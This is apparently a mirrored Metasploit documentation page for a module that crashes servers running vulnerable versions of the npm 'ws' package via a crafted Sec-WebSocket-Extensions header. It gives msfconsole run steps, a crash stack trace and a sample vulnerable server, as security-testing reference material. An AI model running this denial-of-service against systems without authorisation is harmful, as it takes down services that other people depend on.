CoCalc -- ws

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/auxiliary/dos/http/ws_dos.md
²⁵⁶⁴⁰ views

Vulnerable Application

ws < 1.1.5 || (2.0.0 , 3.3.1) https://nodesecurity.io/advisories/550

Vulnerable Analysis

This module exploits a Denial of Service vulnerability in npm module "ws". By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash.

Verification Steps

Start the vulnerable server using the sample server code below node server.js
Start msfconsole
use auxiliary/dos/http/ws_dos
set RHOST <IP>
run
The server should crash

Options

None.

Scenarios

Server output from crash

/Users/sonatype/Downloads/node_modules/ws/lib/Extensions.js:40
    paramsList.push(parsedParams);
               ^

TypeError: paramsList.push is not a function
    at value.split.forEach (/Users/sonatype/Downloads/node_modules/ws/lib/Extensions.js:40:16)
    at Array.forEach (<anonymous>)
    at Object.parse (/Users/sonatype/Downloads/node_modules/ws/lib/Extensions.js:15:20)
    at WebSocketServer.completeUpgrade (/Users/sonatype/Downloads/node_modules/ws/lib/WebSocketServer.js:230:30)
    at WebSocketServer.handleUpgrade (/Users/sonatype/Downloads/node_modules/ws/lib/WebSocketServer.js:197:10)
    at Server.WebSocketServer._ultron.on (/Users/sonatype/Downloads/node_modules/ws/lib/WebSocketServer.js:87:14)
    at emitThree (events.js:136:13)
    at Server.emit (events.js:217:7)
    at onParserExecuteCommon (_http_server.js:495:14)
    at onParserExecute (_http_server.js:450:3)

Sample server

const WebSocket = require('ws');
const wss = new WebSocket.Server(
{ port: 3000 }
);
wss.on('connection', function connection(ws) {
console.log('connected');
ws.on('message', function incoming(message)
{ console.log('received: %s', message); }
);
ws.on('error', function (err)
{ console.error(err); }
);
});